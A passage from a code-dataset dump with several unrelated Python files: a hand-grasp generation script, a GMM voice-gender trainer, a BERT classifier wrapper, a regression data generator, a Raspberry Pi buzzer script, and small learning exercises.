db.commit()\n","repo_name":"DimkaPryg/fitnes_back","sub_path":"services/food_service.py","file_name":"food_service.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"123443408","text":"import os\nimport time\nimport torch\nimport argparse\nfrom torch.utils.data import DataLoader\nfrom dataset.HO3D_diversity_generation import HO3D_diversity\nfrom network.affordanceNet_obman_mano_vertex import affordanceNet\nfrom network.cmapnet_objhand import pointnet_reg\nimport numpy as np\nimport random\nfrom utils import utils, utils_loss\nimport mano\nimport json\nfrom utils.loss import TTT_loss\nimport trimesh\nfrom metric.simulate import run_simulation\n\n\ndef intersect_vox(obj_mesh, hand_mesh, pitch=0.5):\n '''\n Evaluating intersection between hand and object\n :param pitch: voxel size\n :return: intersection volume\n '''\n obj_vox = obj_mesh.voxelized(pitch=pitch)\n obj_points = obj_vox.points\n inside = hand_mesh.contains(obj_points)\n volume = inside.sum() * np.power(pitch, 3)\n return volume\n\ndef mesh_vert_int_exts(obj1_mesh, obj2_verts):\n inside = obj1_mesh.ray.contains_points(obj2_verts)\n sign = (inside.astype(int) * 2) - 1\n return sign\n\n\ndef main(args, model, cmap_model, eval_loader, device, rh_mano, rh_faces):\n '''\n Generate diverse grasps for object index with args.obj_id in out-of-domain HO3D object models\n '''\n model.eval()\n cmap_model.eval()\n rh_mano.eval()\n for batch_idx, (obj_id, obj_pc, origin_verts, origin_faces) in enumerate(eval_loader):\n if obj_id.item() != args.obj_id:\n continue\n obj_xyz = obj_pc.permute(0,2,1)[:,:,:3].squeeze(0).cpu().numpy() # [3000, 3]\n origin_verts = origin_verts.squeeze(0).numpy() # [N, 3]\n recon_params, R_list, trans_list, r_list = [], [], [], []\n\n for i in range(1000000):\n # generate random rotation\n rot_angles = np.random.random(3) * np.pi * 2\n theta_x, theta_y, theta_z = rot_angles[0], rot_angles[1], rot_angles[2]\n Rx = np.array([[1, 0, 0], [0, np.cos(theta_x), -np.sin(theta_x)], [0, np.sin(theta_x), np.cos(theta_x)]])\n Ry = np.array([[np.cos(theta_y), 0, np.sin(theta_y)], [0, 1, 0], [-np.sin(theta_y), 0, np.cos(theta_y)]])\n Rz = np.array([[np.cos(theta_z), -np.sin(theta_z), 0], [np.sin(theta_z), np.cos(theta_z), 0], [0, 0, 1]])\n rot = Rx @ Ry @ Rz # [3, 3]\n # generate random translation\n trans = np.array([-0.0793, 0.0208, -0.6924]) + np.random.random(3) * 0.2\n trans = trans.reshape((3, 1))\n R = np.hstack((rot, trans)) # [3, 4]\n obj_xyz_transformed = np.matmul(R[:3,0:3], obj_xyz.copy().T) + R[:3,3].reshape(-1,1) # [3, 3000]\n obj_mesh_verts = 
(np.matmul(R[:3,0:3], origin_verts.copy().T) + R[:3,3].reshape(-1,1)).T # [N, 3]\n obj_xyz_transformed = torch.tensor(obj_xyz_transformed, dtype=torch.float32)\n obj_pc_transformed = obj_pc.clone()\n obj_pc_transformed[0, :3, :] = obj_xyz_transformed # [1, 4, N]\n\n obj_pc_TTT = obj_pc_transformed.detach().clone().to(device)\n recon_param = model.inference(obj_pc_TTT).detach() # recon [1,61] mano params\n recon_param = torch.autograd.Variable(recon_param, requires_grad=True)\n optimizer = torch.optim.SGD([recon_param], lr=0.00000625, momentum=0.8)\n\n for j in range(300): # non-learning based optimization steps\n optimizer.zero_grad()\n\n recon_mano = rh_mano(betas=recon_param[:, :10], global_orient=recon_param[:, 10:13],\n hand_pose=recon_param[:, 13:58], transl=recon_param[:, 58:])\n recon_xyz = recon_mano.vertices.to(device) # [B,778,3], hand vertices\n\n # calculate cmap from current hand\n obj_nn_dist_affordance, _ = utils_loss.get_NN(obj_pc_TTT.permute(0, 2, 1)[:, :, :3], recon_xyz)\n cmap_affordance = utils.get_pseudo_cmap(obj_nn_dist_affordance) # [B,3000]\n\n # predict target cmap by ContactNet\n recon_cmap = cmap_model(obj_pc_TTT[:, :3, :], recon_xyz.permute(0, 2, 1).contiguous()) # [B,3000]\n recon_cmap = (recon_cmap / torch.max(recon_cmap, dim=1)[0]).detach()\n\n penetr_loss, consistency_loss, contact_loss = TTT_loss(recon_xyz, rh_faces,\n obj_pc_TTT[:, :3, :].permute(0,2,1).contiguous(),\n cmap_affordance, recon_cmap)\n loss = 1 * contact_loss + 1 * consistency_loss + 7 * penetr_loss\n loss.backward()\n optimizer.step()\n if j == 0 or j == 299:\n print(\"Object sample {}, pose {}, iter {}, \"\n \"penetration loss {:9.5f}, \"\n \"consistency loss {:9.5f}, \"\n \"contact loss {:9.5f}\".format(batch_idx, i, j,\n penetr_loss.item(), consistency_loss.item(), contact_loss.item()))\n\n # evaluate grasp\n cam_extr = np.array([[1., 0., 0., 0.], [0., -1., 0., 0.], [0., 0., -1., 0.]]).astype(np.float32)\n obj_mesh_verts = obj_mesh_verts.dot(cam_extr[:3,:3].T) # [N,3]\n obj_mesh = trimesh.Trimesh(vertices=obj_mesh_verts,\n faces=origin_faces.squeeze(0).cpu().numpy().astype(np.int32)) # obj\n final_mano = rh_mano(betas=recon_param[:, :10], global_orient=recon_param[:, 10:13],\n hand_pose=recon_param[:, 13:58], transl=recon_param[:, 58:])\n final_mano_verts = final_mano.vertices.squeeze(0).detach().cpu().numpy() # [778, 3]\n final_mano_verts = final_mano_verts.dot(cam_extr[:3,:3].T)\n try:\n hand_mesh = trimesh.Trimesh(vertices=final_mano_verts, faces=rh_faces.cpu().numpy().reshape((-1, 3)))\n except:\n continue\n # penetration volume\n penetr_vol = intersect_vox(obj_mesh, hand_mesh, pitch=0.005)\n # contact\n penetration_tol = 0.005\n result_close, result_distance, _ = trimesh.proximity.closest_point(obj_mesh, final_mano_verts)\n sign = mesh_vert_int_exts(obj_mesh, final_mano_verts)\n nonzero = result_distance > penetration_tol\n exterior = [sign == -1][0] & nonzero\n contact = ~exterior\n sample_contact = contact.sum() > 0\n # simulation displacement\n vhacd_exe = \"/hand-object/v-hacd/build/linux/test/testVHACD\"\n try:\n simu_disp = run_simulation(final_mano_verts, rh_faces.reshape((-1, 3)),\n obj_mesh_verts, origin_faces.cpu().numpy().astype(np.int32).reshape((-1, 3)),\n vhacd_exe=vhacd_exe, sample_idx=i)\n except:\n simu_disp = 0.10\n save_flag = (penetr_vol < args.penetr_vol_thre) and (simu_disp < args.simu_disp_thre) and sample_contact\n print('generate id: {}, penetr vol: {}, simu disp: {}, contact: {}, save flag: {}'\n .format(i, penetr_vol, simu_disp, sample_contact, 
save_flag))\n if save_flag:\n print('generate id {} saved'.format(i))\n recon_params.append(recon_param.detach().cpu().numpy().tolist())\n R_list.append(R.tolist())\n trans_list.append(trans.tolist())\n r_list.append(np.array([theta_x, theta_y, theta_z]).tolist())\n\n if len(r_list) == args.num_grasp:\n break\n\n save_path = './diverse_grasp/ho3d/obj_id_{}.json'.format(int(obj_id.item()))\n data = {\n 'recon_params': recon_params,\n 'R_list': R_list,\n 'trans_list': trans_list,\n 'r_list': r_list\n }\n with open(save_path, 'w') as f:\n json.dump(data, f)\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n '''experiment setting'''\n parser.add_argument(\"--seed\", type=int, default=0)\n parser.add_argument(\"--batch_size\", type=int, default=1)\n parser.add_argument(\"--use_cuda\", type=int, default=1)\n parser.add_argument(\"--dataloader_workers\", type=int, default=32)\n '''affordance network information'''\n parser.add_argument(\"--affordance_model_path\", type=str, default='checkpoints/model_affordance_best_full.pth')\n parser.add_argument(\"--encoder_layer_sizes\", type=list, default=[1024, 512, 256])\n parser.add_argument(\"--decoder_layer_sizes\", type=list, default=[1024, 256, 61])\n parser.add_argument(\"--latent_size\", type=int, default=64)\n parser.add_argument(\"--obj_inchannel\", type=int, default=4)\n parser.add_argument(\"--condition_size\", type=int, default=1024)\n '''cmap network information'''\n parser.add_argument(\"--cmap_model_path\", type=str, default='checkpoints/model_cmap_best.pth')\n '''Generated graps information'''\n parser.add_argument(\"--obj_id\", type=int, default=6)\n # You can change the two thresholds to save the graps you want\n parser.add_argument(\"--penetr_vol_thre\", type=float, default=4e-6) # 4cm^3\n parser.add_argument(\"--simu_disp_thre\", type=float, default=0.03) # 3cm\n parser.add_argument(\"--num_grasp\", type=int, default=100) # number of grasps you want to generate\n args = parser.parse_args()\n assert args.obj_id in [3, 4, 6, 10, 11, 19, 21, 25, 35, 37]\n\n # device\n use_cuda = args.use_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n print(\"using device\", device)\n\n # network\n affordance_model = affordanceNet(obj_inchannel=args.obj_inchannel,\n cvae_encoder_sizes=args.encoder_layer_sizes,\n cvae_latent_size=args.latent_size,\n cvae_decoder_sizes=args.decoder_layer_sizes,\n cvae_condition_size=args.condition_size) # GraspCVAE\n cmap_model = pointnet_reg(with_rgb=False) # ContactNet\n\n # load pre-trained model\n checkpoint_affordance = torch.load(args.affordance_model_path, map_location=torch.device('cpu'))['network']\n affordance_model.load_state_dict(checkpoint_affordance)\n affordance_model = affordance_model.to(device)\n checkpoint_cmap = torch.load(args.cmap_model_path, map_location=torch.device('cpu'))['network']\n cmap_model.load_state_dict(checkpoint_cmap)\n cmap_model = cmap_model.to(device)\n\n # dataset\n dataset = HO3D_diversity()\n dataloader = DataLoader(dataset=dataset, batch_size=1, shuffle=False, num_workers=1)\n # mano hand model\n with torch.no_grad():\n rh_mano = mano.load(model_path='./models/mano/MANO_RIGHT.pkl',\n model_type='mano',\n use_pca=True,\n num_pca_comps=45,\n batch_size=1,\n flat_hand_mean=True).to(device)\n rh_faces = torch.from_numpy(rh_mano.faces.astype(np.int32)).view(1, -1, 3).to(device) # [1, 1538, 3], face indexes\n\n main(args, affordance_model, cmap_model, dataloader, device, rh_mano, 
rh_faces)\n\n","repo_name":"hwjiang1510/GraspTTA","sub_path":"gen_diverse_grasp_ho3d.py","file_name":"gen_diverse_grasp_ho3d.py","file_ext":"py","file_size_in_byte":11189,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"72"} +{"seq_id":"25939246892","text":"from datetime import datetime\nimport logging\nimport logging.config\n\n# 설정 파일 읽어오기\nlogging.config.fileConfig('PDF_table_extract/config/logging.conf')\n\n# 로거 생성\nlogger = logging.getLogger(__name__)\n\nfh = logging.FileHandler(\n 'PDF_table_extract/log/{:%Y-%m}.log'.format(datetime.now())\n)\nformatter = logging.Formatter(\n '%(asctime)s | %(levelname)-8s | %(lineno)04d | %(message)s'\n)\nfh.setFormatter(formatter)\nlogger.addHandler(fh)","repo_name":"TableExtractorPdf/PDF_table_extract","sub_path":"PDF_table_extract/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32245610170","text":"# a program that tests the compatibility between two people.\n#To work out the love score between two people:\n#Take both people's names and check for the number of times the letters in the word TRUE occurs. \n#Then check for the number of times the letters in the word LOVE occurs. \n#Then combine these numbers to make a 2 digit number.\n\n\nprint(\"Welcome to the Love Calculator!\")\nname1 = input(\"What is your name? \\n\")\nname2 = input(\"What is their name? \\n\")\n\nnameA = name1.lower()\nnameB = name2.lower()\n\n\nt = (nameA.count(\"t\") + nameB.count(\"t\"))\nr = (nameA.count(\"r\") + nameB.count(\"r\"))\nu = (nameA.count(\"u\") + nameB.count(\"u\"))\ne = (nameA.count(\"e\") + nameB.count(\"e\"))\nresult_1 = t + r + u + e\n\nl = (nameA.count(\"l\") + nameB.count(\"l\"))\no = (nameA.count(\"o\") + nameB.count(\"o\"))\nv = (nameA.count(\"v\") + nameB.count(\"v\"))\ne = (nameA.count(\"e\") + nameB.count(\"e\"))\nresult_2 = l + o + v + e\n\nlove_score_1 = str(result_1) + str(result_2)\nlove_score = int(love_score_1)\n\nif love_score < 10 or love_score > 90:\n print(f\"Your score is {love_score}, you go together like coke and mentos.\")\nelif love_score >= 40 and love_score <= 50:\n print(f\"Your score is {love_score}, you are alright together.\")\nelse:\n print(f\"Your score is {love_score}.\")\n\n\n#RENDAN_TOCHUKWU\n","repo_name":"onahafranco/100-days-python-bootcamp","sub_path":"Day_3/Exercise/love_calculator.py","file_name":"love_calculator.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19118176224","text":"import numpy as np\n\n\nclass Data:\n\n def __init__(self, n_train, n_test):\n\n self.n_train = n_train\n self.n_test = n_test\n\n\n def __repr__(self):\n\n desc_title = f\"Data object for non-parametric regresssion\"\n desc_n_train = \"\\nNumber of training samples: n_train = \" + str(self.n_train)\n desc_n_test = \"\\nNumber of testing samples: n_test = \" + str(self.n_test)\n\n desc = desc_title + desc_n_train + desc_n_test\n return desc\n\n\n def generate_x_deterministic(self, x_min, x_max):\n\n self.x_train = np.linspace(x_min, x_max, self.n_train)\n self.x_test = np.linspace(x_min, x_max, self.n_test)\n\n\n def generate_x_uniform_random(self, x_min, x_max):\n\n x_range = x_max - x_min\n x_train = x_min + (x_range * np.random.random(size=self.n_train))\n x_test = x_min + (x_range * np.random.random(size=self.n_test))\n\n self.x_train = 
np.sort(x_train)\n self.x_test = np.sort(x_test)\n\n\n def generate_mu_polynomial(self, coeffs):\n\n assert hasattr(self, \"x_train\"), \"Must generate x values before mu values\"\n\n n_coeffs = len(coeffs)\n monomials_train = np.zeros((self.n_train, n_coeffs))\n monomials_test = np.zeros((self.n_test, n_coeffs))\n\n for k in range(len(coeffs)):\n monomials_train[:,k] = self.x_train ** k\n monomials_test[:,k] = self.x_test ** k\n\n self.mu_train = np.sum(monomials_train * coeffs, axis=1)\n self.mu_test = np.sum(monomials_test * coeffs, axis=1)\n\n\n def generate_mu_topologist_sine_curve(self):\n\n x_min = min(np.amin(self.x_train), np.amin(self.x_test))\n x_max = max(np.amax(self.x_train), np.amax(self.x_test))\n x_range = x_max - x_min\n\n x_train_scaled = (self.x_train - x_min) / x_range\n x_test_scaled = (self.x_test - x_min) / x_range\n\n self.mu_train = 0.5 + 0.5 * np.sin((x_train_scaled+1)**6)\n self.mu_test = 0.5 + 0.5 * np.sin((x_test_scaled+1)**6)\n\n\n def generate_y_gaussian(self, sigma):\n\n self.eps_train = np.random.normal(scale=sigma, size=self.n_train)\n self.eps_test = np.random.normal(scale=sigma, size=self.n_test)\n\n self.y_train = self.eps_train + self.mu_train\n self.y_test = self.eps_test + self.mu_test\n\n\n def loo(self, index):\n\n loo_data = Data(self.n_train - 1, 1)\n\n loo_data.x_train = np.delete(self.x_train, [index])\n loo_data.mu_train = np.delete(self.mu_train, [index])\n loo_data.eps_train = np.delete(self.eps_train, [index])\n loo_data.y_train = np.delete(self.y_train, [index])\n\n loo_data.x_test = self.x_train[index]\n loo_data.mu_test = self.mu_train[index]\n loo_data.eps_test = self.eps_train[index]\n loo_data.y_test = self.y_train[index]\n\n return loo_data\n\n\n def k_fold(self, k_fold, index):\n\n np.random.seed(23049234)\n random_order = np.random.permutation(self.n_train)\n part_size = self.n_train // k_fold\n k_fold_partition = [i * part_size for i in range(k_fold)] + [self.n_train]\n k_fold_start = k_fold_partition[index]\n k_fold_end = k_fold_partition[index + 1]\n k_fold_n_train = self.n_train - (k_fold_end - k_fold_start)\n k_fold_n_test = k_fold_end - k_fold_start\n k_fold_test_indices = random_order[list(range(k_fold_start, k_fold_end))]\n\n k_fold_data = Data(k_fold_n_train, k_fold_n_test)\n\n k_fold_data.x_train = np.delete(self.x_train, k_fold_test_indices)\n k_fold_data.mu_train = np.delete(self.mu_train, k_fold_test_indices)\n k_fold_data.eps_train = np.delete(self.eps_train, k_fold_test_indices)\n k_fold_data.y_train = np.delete(self.y_train, k_fold_test_indices)\n\n k_fold_data.x_test = self.x_train[k_fold_test_indices]\n k_fold_data.mu_test = self.mu_train[k_fold_test_indices]\n k_fold_data.eps_test = self.eps_train[k_fold_test_indices]\n k_fold_data.y_test = self.y_train[k_fold_test_indices]\n\n return k_fold_data\n","repo_name":"WGUNDERWOOD/wgunderwood.github.io","sub_path":"_posts/local_polynomial_regression/data_generation.py","file_name":"data_generation.py","file_ext":"py","file_size_in_byte":3752,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"38194789957","text":"#IMPORT REQUIRED LIBRARIES\n\nimport os\nimport _pickle as cPickle\nimport numpy as np\nfrom scipy.io.wavfile import read\nfrom sklearn.mixture import GaussianMixture\nimport python_speech_features as MFCC\nfrom sklearn import preprocessing\nimport warnings\n\n#GENERAL WARNING FILTER IGNORES MATCHING WARNINGS\nwarnings.filterwarnings(\"ignore\")\n\n#TO GET MEL FREEQUENCY CEPSTRAL COEFFICIENTS OF THE 
AUDIO\ndef get_MFCC(sr,audio):\n \n #MFCC IS SUBSTITUE FOR python_speech_features CLASS. THIS CREATES A SHAPE FOR THE AUDIO \n features = MFCC.mfcc( audio , sr , 0.025 , 0.01 , 13 , appendEnergy = False )\n \n #TO STANDARDIZE ANY DATASET ALONG ANY AXIS\n features = preprocessing.scale(features)\n\n #RETURNS STANDARDIZED DATA\n return features\n\n#SOURCES OF AUDIO TRAINING FILE\n#FOR DIFFERENT MODULES CLASSIFY EACH INTO SEPERATE LOCATION AND PROVIDE THE DATA ACCORDINGLY\n#HERE ONLY TWO MODULES SUCH AS MALE AND FEMALE ARE USED\n#RUN THIS PROGRAM WITH SOURCE DENOTING MALE AUDIO TRAININGS ONCE AND FEMALE AUDIO TRAININGS ONCE\n#THIS CREATES TWO DIFFERENT MODULES IN THE GIVEN DESTINATION\n#ONE IS MALE VOICE MODULE AND OTHER IS FEMALE VOICE MODULE\n\nsource = \"/home/siva/GenderClassification/Dataset/train_data/youtube/male\"\n\n#DESTINATION LOCATION TO STORE MODULES\ndest = \"/home/siva/GenderClassification/Modules/\"\n\n#COLLECT ALL THE FILES WHICH ARE TRAINING MODULE. HERE THE AUDIO FILE IS EXPECTED TO BE IN .wav FORMAT\n# files IS A LIST OF ONLY .wav FILES FROM THE PROVIDED SOURCE LOCATION\nfiles = [os.path.join(source,f) for f in os.listdir(source) if f.endswith('.wav')]\n\n#TO STORE RETURNED DATA FROM get_MFCC() FUNCTION\nfeatures = np.asarray(())\n\n#TO READ ALL TRAIN FILES, RUN A FOR LOOP ON THE COLLECTION\nfor f in files:\n \n #sr DENOTES SAMPLING RATE AND audio DENOTES THE SOURCE SIGNAL\n sr,audio = read(f)\n \n #vector STORES THE RETRUNED VALUE FROM THE get_MFCC() FUNCTION\n vector = get_MFCC(sr,audio)\n\n #FOR THE FIRST AUDIO SIGNAL features REMAINS EMPTY. SO ASSIGN THE RETURNED VALUE TO features\n if features.size == 0:\n features = vector\n else:\n #FOR THE FOLLOWING ITERATIONS DEVELOP features AS A VECTOR STACK \n features = np.vstack((features, vector)) \n\n#ONCE ALL TRAINING FILES ARE STACKED, CREATE A GAUSSIAN MIXTURE MODEL\ngmm = GaussianMixture(n_components = 8, covariance_type='diag', max_iter = 200 , n_init = 3 )\n\n#fit() ESTIMATES THE MODEL PARAMETERS USING THE EM ALGORITHM\ngmm.fit(features)\n\n#picklefile PROVIDES THE DESTINATION TO STORE THE .gmm FILE\npickleFile = f.split(\"/\")[-2].split(\".wav\")[0]+\".gmm\"\n\n#MODEL SAVED IN FILE BY dump() FUNCTION\ncPickle.dump(gmm,open(dest + pickleFile,'wb'))\n\nprint (\"Modeling Completed for Gender : \" + pickleFile)","repo_name":"sivajayaraman/Voice-Based-Gender-Detection","sub_path":"trainModels.py","file_name":"trainModels.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17606487595","text":"import conf\nimport torch\nimport torch.nn as nn\n\ndimension_dictionary = {\n 'bert': 768,\n 'distilbert': 768,\n 'bert-tiny': 128,\n 'bert-mini': 256,\n 'bert-small': 512,\n 'bert-medium': 512,\n 'mobilebert': 512,\n 'bart': 1024,\n}\n\ndef load_backbone(name, output_attentions=False):\n if name == 'bert':\n from transformers import BertModel, BertTokenizer\n backbone = BertModel.from_pretrained('bert-base-uncased', output_attentions=output_attentions)\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n tokenizer.name = 'bert-base-uncased'\n elif name == 'distilbert':\n from transformers import DistilBertModel, DistilBertTokenizer\n backbone = DistilBertModel.from_pretrained('distilbert-base-uncased', output_attentions=output_attentions)\n tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased')\n tokenizer.name = 'distilbert-base-uncased'\n elif name in ['bert-tiny', 'bert-mini', 'bert-small', 
'bert-medium']:\n from transformers import AutoModel, AutoTokenizer\n backbone = AutoModel.from_pretrained(f'prajjwal1/{name}')\n tokenizer = AutoTokenizer.from_pretrained(f'prajjwal1/{name}')\n tokenizer.name = name\n elif name == 'mobilebert':\n from transformers import MobileBertModel\n from transformers import MobileBertTokenizer\n backbone = MobileBertModel.from_pretrained('google/mobilebert-uncased')\n tokenizer = MobileBertTokenizer.from_pretrained('google/mobilebert-uncased')\n tokenizer.name = 'mobilebert-uncased'\n elif name == 'bart':\n from transformers import BartModel\n from transformers import BartTokenizer\n backbone = BartModel.from_pretrained(\"facebook/bart-large\")\n tokenizer = BartTokenizer.from_pretrained(\"facebook/bart-large\")\n tokenizer.name = 'bart'\n else:\n raise ValueError('No matching backbone network')\n\n return backbone, tokenizer\n\nclass BaseNet(nn.Module):\n\n def __init__(self, model_name='', mode='base'):\n super(BaseNet, self).__init__()\n self.model_name = model_name\n\n if mode == \"base\":\n backbone, tokenizer = load_backbone(self.model_name)\n self.backbone = backbone\n self.tokenizer = tokenizer\n self.n_classes = conf.args.opt['num_class']\n self.dropout = nn.Dropout(0.1)\n\n dim = self.get_feat_dim(model_name)\n self.dense_layer = nn.Linear(dim, dim)\n self.class_layer = nn.Linear(dim, self.n_classes)\n\n def forward(self, x):\n if 'bert' in self.model_name:\n attention_mask = (x>0).float() # 0 is the pad_token for BERT family\n\n if self.model_name in ['bert', 'bert-tiny', 'bert-mini', 'bert-small', 'bert-medium', 'mobilebert']:\n out_h, out_p = self.backbone(x, attention_mask, return_dict=False) # hidden, pooled\n out_p = self.dropout(out_p)\n out_cls = self.class_layer(out_p)\n # https://github.com/huggingface/transformers/blob/v4.21.0/src/transformers/models/distilbert/modeling_distilbert.py#L689\n elif self.model_name in ['distilbert']:\n out_h = self.backbone(x, attention_mask)[0] # hidden state. (bs, seq_len, dim)\n out_p = out_h[:, 0] # (bs, dim)\n out_p = self.dense_layer(out_p) # (bs, dim)\n out_p = torch.nn.ReLU()(out_p) # (bs, dim)\n out_p = self.dropout(out_p) # (bs, dim)\n out_cls = self.class_layer(out_p) # (bs, num_labels) # TODO: include self.dense?\n elif 'bart' in self.model_name:\n attention_mask = (x > 0).float()\n out_h = self.backbone(x, attention_mask)[0] # hidden state. (bs, seq_len, dim)\n\n out_p = out_h[:, 0] # (bs, dim)\n out_p = self.dense_layer(out_p) # (bs, dim)\n out_p = torch.nn.ReLU()(out_p) # (bs, dim)\n out_p = self.dropout(out_p) # (bs, dim)\n out_cls = self.class_layer(out_p) # (bs, num_labels)\n return out_cls\n\n def get_feature(self, x): # used for LAME, which replaces the final classification layer\n if 'bert' in self.model_name:\n attention_mask = (x > 0).float() # 0 is the pad_token for BERT family\n\n if self.model_name in ['bert', 'bert-tiny', 'bert-mini', 'bert-small', 'bert-medium', 'mobilebert']:\n out_h, out_p = self.backbone(x, attention_mask, return_dict=False) # hidden, pooled\n out_p = self.dropout(out_p)\n # https://github.com/huggingface/transformers/blob/v4.21.0/src/transformers/models/distilbert/modeling_distilbert.py#L689\n elif self.model_name in ['distilbert']:\n out_h = self.backbone(x, attention_mask)[0] # hidden state. 
(bs, seq_len, dim)\n            out_p = out_h[:, 0] # (bs, dim)\n            out_p = self.dense_layer(out_p) # (bs, dim)\n            out_p = torch.nn.ReLU()(out_p) # (bs, dim)\n            out_p = self.dropout(out_p) # (bs, dim)\n\n        return out_p\n\n    def get_tokenizer(self):\n        return self.tokenizer\n\n\n    def get_feat_dim(self, model_name):\n        return dimension_dictionary[model_name]\n\n    def get_input_embeddings(self):\n        return self.backbone.get_input_embeddings()\n\n    def set_input_embeddings(self, embeddings):\n        return self.backbone.set_input_embeddings(embeddings)\n\n\n    def get_config(self):\n        return self.backbone.config\n\n    def set_backbone_gradient(self, bool):\n        for params in self.backbone.parameters():\n            params.requires_grad = bool","repo_name":"holymollyhao/cs470_intro_to_ai","sub_path":"models/BaseTransformer.py","file_name":"BaseTransformer.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"16673867288","text":"\"\"\"\npyspark usage\n\"\"\"\nfrom pyspark import SparkConf, SparkContext\n\n# Create the SparkConf object; 'local' runs locally, a cluster needs different settings\nconf = SparkConf().setMaster(\"local[*]\").setAppName(\"test_python_database\")\n\n# Create the SparkContext object from the SparkConf\nsc = SparkContext(conf=conf)\nrdd1 = sc.parallelize([1, 2, 3, 4, 5])\nrdd2 = sc.parallelize((1, 2, 3, 4, 5))\nrdd3 = sc.parallelize(\"test\")\nrdd4 = sc.parallelize({1, 2, 3, 4, 5})\nrdd5 = sc.parallelize({\"1\": \"1\", \"2\": \"2\", \"3\": \"3\", \"4\": \"4\"})\nprint(sc.version)\nprint(rdd1.collect())\nprint(rdd2.collect())\nprint(rdd3.collect())\nprint(rdd4.collect())\nprint(rdd5.collect())\n\n# Stop the Spark context\nsc.stop()\n","repo_name":"BigRootMasters/python_learn","sub_path":"learn/learn_content/learn_pyspark.py","file_name":"learn_pyspark.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"5189991162","text":"# Based on: http://bit.ly/226GBjt (Limor \"Ladyada\" Fried for Adafruit Industries, (c) 2015)\n\n\nimport RPi.GPIO as GPIO\nimport time\n\nimport adc\n\n# Use GPIO.BOARD pin numbering,\n# details: http://bit.ly/1pC3VEs\nGPIO.setmode(GPIO.BOARD)\n\n# Pin numbers used for SPI; the ADC is connected here\n# SPI port on the ADC to the Cobbler\nSPICLK = 12\nSPIMISO = 16\nSPIMOSI = 18\nSPICS = 22\n\n# Pin the buzzer is connected to\nBUZZER_PIN = 40\n\n# Configure the buzzer pin as an output\nGPIO.setup(BUZZER_PIN, GPIO.OUT)\n\n# Maximum frequency in hertz.\n# The buzzer sounds at this frequency when the potentiometer is turned all the way up\nMAX_FREQ = 400 # Hz\n\n# About PWM in RPi.GPIO: https://sourceforge.net/p/raspberry-gpio-python/wiki/PWM/\n\n# Create a PWM instance.\n# Through this object we output a signal on pin BUZZER_PIN at a given frequency\nbuzzer_pwm = GPIO.PWM(BUZZER_PIN, MAX_FREQ)\n\n# set up the SPI interface pins\nGPIO.setup(SPIMOSI, GPIO.OUT)\nGPIO.setup(SPIMISO, GPIO.IN)\nGPIO.setup(SPICLK, GPIO.OUT)\nGPIO.setup(SPICS, GPIO.OUT)\n\n# 10k trim pot connected to adc #0\npotentiometer_adc = 0\n\nlast_read = 0       # Tracks the last value read from the potentiometer\ntolerance = 7       # Minimum change in value. A new potentiometer reading is\n                    # accepted only when it differs from the previous one by\n                    # more than tolerance. Needed to suppress jitter\n\n# Start buzzing. 
50.0 is the percentage of time the pin is held high\nbuzzer_pwm.start(50.0)\n\n# Main infinite loop\nwhile True:\n    # we'll assume that the pot didn't move\n    trim_pot_changed = False\n\n    # read the analog pin\n    trim_pot = adc.readadc(potentiometer_adc, SPICLK, SPIMOSI, SPIMISO, SPICS)\n\n    # how much has it changed since the last read?\n    pot_adjust = abs(trim_pot - last_read)\n\n    # If the change is greater than tolerance\n    if pot_adjust > tolerance:\n        # consider the pot to have moved\n        trim_pot_changed = True\n\n    # If the pot was turned...\n    if ( trim_pot_changed ):\n        set_frequency = trim_pot / 10.24           # convert the 10-bit adc0 value (0-1024) into a\n                                                   # frequency percentage (from 0 to 100)\n        set_frequency = round(set_frequency, 2)    # round the value to two decimal places\n        #set_frequency = int(set_frequency)        # cast volume as integer\n\n        print('Frequency = {freq}%' .format(freq = set_frequency)) # print the new frequency value\n\n        buzzer_pwm.ChangeFrequency(                # change the buzzing frequency to...\n            max(\n                MAX_FREQ * set_frequency / 100.0,  # ...the maximum frequency times the percentage\n                1                                  # ...or to 1 Hz if the pot is set to zero\n            )\n        )\n\n        # save the potentiometer reading for the next loop\n        last_read = trim_pot\n\n    # hang out and do nothing for a 1/10th of second\n    time.sleep(0.1)\n","repo_name":"crtv-club/dotcat_demo_rpi","sub_path":"2016.03.11/adc_potentiometer.py","file_name":"adc_potentiometer.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"72451771112","text":"#PASSED but not efficient enough for 15x15 puzzles\r\n\r\n# Once you complete this kata, there is a 15x15 Version that you can try. And once you complete that, you can do the Multisize Version which goes up to 50x50.\r\n#\r\n# Description\r\n# For this kata, you will be making a Nonogram solver. :)\r\n#\r\n# If you don't know what Nonograms are, you can look at some instructions and also try out some Nonograms here.\r\n#\r\n# For this kata, you will only have to solve 5x5 Nonograms. :)\r\n#\r\n# Instructions\r\n# You need to complete the Nonogram class and the solve method:\r\n#\r\n# class Nonogram:\r\n#\r\n#     def __init__(self, clues):\r\n#         pass\r\n#\r\n#     def solve(self):\r\n#         pass\r\n# You will be given the clues and you should return the solved puzzle. All the puzzles will be solvable so you will not need to worry about that.\r\n#\r\n# The clues will be a tuple of the horizontal clues, then the vertical clues, which will contain the individual clues. For example, for the 